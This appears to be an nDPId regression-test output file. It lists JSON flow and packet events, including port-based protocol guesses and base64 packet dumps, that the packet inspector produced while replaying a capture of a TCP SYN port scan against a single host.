-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2003,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1092,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1992,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsGsUAADQG+a2sEAAIQA2GNIzTBETdU4MZAAAAAGACBAAwSAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2004,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2004,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsALEAADsGDMKsEAAIQA2GNIzTE4rdU4MZAAAAAGACEAAVAgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAs5sAAACYGO7KsEAAIQA2GNIzTE4bdU4MZAAAAAGACDAAZBgAAAgQFtA=="} -00783{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"1":"Match by port"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3390,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3390,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00783{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"1":"Match by port"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9535,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9535,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3390,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3390,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9535,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9535,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5440,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5440,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5440,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5440,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19780,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1057,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1057,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19780,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1352,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LotusNotes","breed":"Acceptable","category":"Collaborative"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7496,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1352,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LotusNotes","breed":"Acceptable","category":"Collaborative"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7496,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1073,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3404,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1073,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3404,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7512,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":996,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":996,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 